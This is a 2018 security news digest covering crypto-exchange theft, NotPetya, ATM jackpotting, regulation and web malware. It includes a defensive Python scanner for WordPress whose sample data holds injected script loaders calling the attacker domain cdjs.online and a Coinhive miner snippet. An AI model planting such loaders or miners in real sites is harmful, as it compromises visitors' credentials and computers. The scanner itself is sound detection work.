IT Security News Blast 01-29-2018

Maersk Hack

Hacked Japanese cryptocurrency exchange to repay owners $425 million
That amounts to nearly 90 percent of the 58 billion yen worth of NEM coins the company lost in an attack that forced it on Friday to suspend withdrawals of all cryptocurrencies except bitcoin. Coincheck said in a statement it would repay the roughly 260,000 owners of NEM coins in Japanese yen, though it was still working on timing and method.

NotPetya attack totally destroyed Maersk’s computer network: Chairman
Maersk Chairman Jim Hagemann Snabe said while participating on a cybersecurity panel at the conference that his company replaced 45,000 PCs and 4,000 servers and installed 2,500 applications. The computer system runs an operation where a ship carrying 20,000 containers enters a port every 15 minutes somewhere around the world. Overall, Maersk handles 20 percent of all world trade, he said. “We found we had to reinstall our entire infrastructure. It was done in a heroic effort in just 10 days,” he said, adding such a job should take about six months to complete.

First ‘Jackpotting’ Attacks Hit U.S. ATMs
On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States. “While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”

7 breach notification processes that must be followed
The breach notification rule requiring HIPAA-covered entities and their business associates to provide public notification following a breach of unsecured protected health information has been around since 2009. But with the industry besieged with ransomware and warnings that it will increasingly get worse during 2018, it’s time for a refresher course on complying with the rule’s provisions, courtesy of guidance from the Department of Health and Human Services, which enforces the rule.

UK Government warns energy, health and water brands to prepare for cyber attacks or face fines
Under the new system any cyber breaches and IT failures will have to be reported to the regulator who will assess whether appropriate security measures were in place. The regulator will have the power to issue legally-binding instructions to improve security, and – if appropriate – impose financial penalties. The National Cyber Security Centre (NCSC) has today published detailed guidance to help organisations comply, which is based around 14 key principles.

EC issues GDPR guidance
Noting that “no entity in the privacy and data protection universe – from national regulator to the smallest data processor – will be unaffected by the GDPR and the Commission is doing everything in its power to ensure no one is caught unawares,” Pfeife said, the guidance “also implies, however, that there will be an expectation of compliance on day one and ignorance will not be a defense.”

National security threats in year one of Trump administration: Cyber security, lone wolves
“The United States worries about the destructive attack…it’s the attack that corrupts a hard drive and literally destroys it and destroys the data,” said Townsend, pointing to the cyberattacks carried out in the Middle East and on Sony Corporation by the North Koreans. She adds, however, that “influence operations” that mirror that of Russia’s meddling or influence in the 2016 election pose a “real threat” to the U.S.

Candid camera: Dutch hacked Russians hacking DNC, including security cameras
AIVD’s intrusion into the network gave them access to computers used by the group behind Cozy Bear and to the closed-circuit television cameras that watched over them, allowing them to literally witness everything that took place in the building near Red Square, according to the report. […] The information gathered during the surveillance, Modderkolk’s sources suggested, was key to the US intelligence agencies’ attribution of the DNC breach to Russia. And the leaks that have followed, as well as the Trump administration’s recalcitrance in accepting the attribution, have made the Dutch intelligence community a “lot more cautious when it comes to sharing intelligence,” Modderkolk wrote.

Terabit Army: China Squares up on the Battlefield of Information
The result was the “informationization” of warfare, where information is applied to all aspects of warfare. This included not just weapons, but logistics, personnel selection and management, and decision-making. “Information dominance,” in this context, entails the ability to collect more information, manage it better, transmit it faster, and employ it more precisely and more accurately than the adversary.

U.S. ingenuity created the Internet; can it keep it safe and secure?
This integrated Chinese approach to cyber, economic and military power demands that we come up with a creative and strategic response of our own. The United States cannot and should not mirror China’s centralized model. China is an autocratic society in which the government can centrally plan and implement a unified approach. In contrast, our free and open system, while less directed, fosters innovation and creativity. This is a feature, not a bug.

North Korea tells Theresa May to ‘mind her own business’ as it issues stark cyber warning
Kim Jong-un’s media mouthpiece, KCNA, delivered the warning after declaring “it doesn’t make sense” to place the blame of the WannaCry hack. It said: “The US and its followers such as Britain had better mind their own businesses rather than provoking other countries over cyber attack. […] The North Korean regime then launched a scathing attack on the US for “misleading the public” and linking devastating hacks to Kim Jong-un on “no grounds”.

Stopping the Next Cyber Conflict
Governments must begin to hold cyber adversaries to account. In the absence of effective deterrence, governments are, in effect, encouraging more innovation and boldness by our enemies. The good news is that attribution – identifying who is responsible – is now largely a solved problem. Capabilities of both governments and private sector have improved; both are now competent at the swift identification of perpetrators of most intrusions, as evidenced by the fact that nearly every significant cyberattack in recent years has been attributed.

Montana to FCC: You can’t stop us from protecting net neutrality
The FCC’s repeal of net neutrality rules attempts to preempt states and localities from issuing their own similar rules. But Bullock’s executive order doesn’t directly require ISPs to follow net neutrality rules. Instead, ISPs that accept contracts to provide Internet service to any state agency must agree to abide by net neutrality principles throughout the state. Bullock’s fact sheet is titled, “Why Isn’t Montana’s Executive Order Preempted?” and it offers numerous answers to that question.

Microsoft works weekends to kill Intel’s shoddy Spectre patch
Microsoft has implemented Intel’s advice to reverse the Spectre variant 2 microcode patches. Redmond issued a rare weekend out-of-cycle advisory on Saturday to make the unwind possible. Intel’s first patch was so bad, it made many computers less stable, sending Linus Torvalds into a justifiable meltdown last week. Chipzilla later withdrew the patch, but it had made its way into a Microsoft fix, which the company pulled on Saturday.

Keylogger Campaign Returns, Infecting 2,000 WordPress Sites
Attackers inject scripts into WordPress sites with weak or outdated security. “The cdjs[.]online script is injected into either a WordPress database (wp_posts table) or into the theme’s functions.php file,” Sinegubko wrote. Attackers target both the admin login page and the site’s public-facing frontend. HTML is obfuscated to include JavaScript code, such as “googleanalytics.js”, that loads the malicious “startGoogleAnalytics” scripts from the attackers’ domains.

Baby boomers more cybersecurity savvy than Gen-Z, study
Baby boomers were also the least likely to spread malware and other cyber threats, as 94.2 percent said they had not forwarded emails from unknown senders within the past year. Millennials fared in between the two, with only 34.2 percent accurately defining ransomware. The study also found that millennials, the “selfie generation”, were the most concerned about losing personal photos in a cyberattack, making up 28.9 percent of respondents afraid of a photo leak.

Now even YouTube serves ads with CPU-draining cryptocurrency miners
The ads contain JavaScript that mines the digital coin known as Monero. In nine out of 10 cases, the ads will use publicly available JavaScript provided by Coinhive, a cryptocurrency-mining service that’s controversial because it allows subscribers to profit by surreptitiously using other people’s computers. The remaining 10 percent of the time, the YouTube ads use private mining JavaScript that saves the attackers the 30 percent cut Coinhive takes.
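As an added example (not code from Sucuri, Coinhive or any of the articles above), the following Python scanner shows how a site owner might check the two injection points named in the WordPress keylogger item (rows of the wp_posts table and the theme’s functions.php) and at the same time catch the kind of in-page Monero miner described in the YouTube item. It decodes the two obfuscations most often used to hide such loaders (\xNN escapes and String.fromCharCode lists), flags known indicators (the cdjs[.]online domain and the startGoogleAnalytics name come from the report; the coinhive.min.js and CoinHive.Anonymous names are assumed from the Coinhive library), and reports any script src host that is not on an allowlist. The sample posts, theme file and allowlist are constructed for the example and are not real site data.

```python
"""Scan WordPress content for injected script loaders and in-page miners.

Added example, not code from the articles above or from any vendor.
The sample rows, theme file, allowlist and the Coinhive library names
are assumptions made for this example.
"""
import re

# Hosts this (hypothetical) site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}

# Indicators: attacker domain and loader name from the report (the defanged
# form "cdjs[.]online" is accepted too); Coinhive library/object names assumed.
IOC_PATTERNS = {
    "cdjs_online": re.compile(r"cdjs\[?\.\]?online", re.I),
    "fake_ga_loader": re.compile(r"startGoogleAnalytics", re.I),
    "coinhive_miner": re.compile(r"coinhive\.min\.js|CoinHive\.Anonymous", re.I),
}

# <script ... src="https://host/..."> (a protocol-relative //host also matches)
SCRIPT_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+)", re.I)
HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def deobfuscate(text):
    """Undo \\xNN escapes and String.fromCharCode(...) lists so indicators
    hidden inside obfuscated HTML/JS become visible to the pattern scan."""
    text = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    return FROM_CHAR_CODE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
        text)


def script_hosts(text):
    """Hosts referenced by <script src=...> tags in text (lower-cased)."""
    return {h.lower() for h in SCRIPT_SRC.findall(text)}


def scan_text(text, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return sorted findings for one blob of post content or theme code."""
    decoded = deobfuscate(text)
    findings = [f"ioc:{name}" for name, pat in IOC_PATTERNS.items() if pat.search(decoded)]
    findings += [f"unlisted-host:{h}" for h in script_hosts(decoded) if h not in allowed]
    return sorted(findings)


def scan_site(posts, theme_files, allowed=ALLOWED_SCRIPT_HOSTS):
    """posts: (ID, post_content) rows as read from wp_posts;
    theme_files: {path: source}. Returns {location: findings} for hits only."""
    report = {}
    for post_id, content in posts:
        hits = scan_text(content, allowed)
        if hits:
            report[f"wp_posts:{post_id}"] = hits
    for path, source in theme_files.items():
        hits = scan_text(source, allowed)
        if hits:
            report[path] = hits
    return report


# Constructed samples mimicking the described injections (not real site data).
SAMPLE_POSTS = [
    (1, "<p>Welcome to our shop.</p>"),
    # Hex-escaped loader tag plus a fromCharCode-hidden call to startGoogleAnalytics
    (2, r'<p>Sale!</p><script>var s="\x3cscript src=\x22https://cdjs.online/googleanalytics.js\x22\x3e\x3c/script\x3e";'
        r'document.write(s);window[String.fromCharCode(115,116,97,114,116,71,111,111,103,108,101,65,110,97,108,121,116,105,99,115)]();</script>'),
    (3, '<script async src="https://www.google-analytics.com/analytics.js"></script><p>Legit tracking.</p>'),
    # Coinhive-style miner dropped into a post (library names assumed)
    (4, '<script src="https://coinhive.com/lib/coinhive.min.js"></script><script>new CoinHive.Anonymous("SITEKEY").start();</script>'),
]
SAMPLE_THEME_FILES = {
    "wp-content/themes/shop/functions.php": r"""<?php
function shop_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'shop_setup');
// injected: prints the attacker's loader into every page head
add_action('wp_head', function () {
    echo "<script type='text/javascript' src='https://cdjs.online/googleanalytics.js'></script>";
});
""",
}

if __name__ == "__main__":
    for location, hits in scan_site(SAMPLE_POSTS, SAMPLE_THEME_FILES).items():
        print(location, hits)
```

Run against a real site, the posts would come from `SELECT ID, post_content FROM wp_posts` and the theme files from the active theme directory; the allowlist is the part that needs tuning per site, since a newly unlisted host is exactly the signal that a loader was planted.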

Lenovo Fixes Hardcoded Password Flaw Impacting ThinkPad Fingerprint Scanners
“Sensitive data stored by Lenovo Fingerprint Manager Pro, version 8.01.86 and earlier, including users’ Windows logon credentials and fingerprint data, is encrypted using a weak algorithm, contains a hard-coded password, and is accessible to all users with local non-administrative access to the system in which it is installed,” according to Mitre’s Common Vulnerabilities and Exposures description of the vulnerability (CVE-2017-3762).

Critical Informatics and the Critical Informatics logo are the trademarks of Critical Informatics, Inc. All other brand names, trademarks, service marks and copyrights are the property of their respective owners.  © 2017 Critical Informatics, Inc. All rights reserved.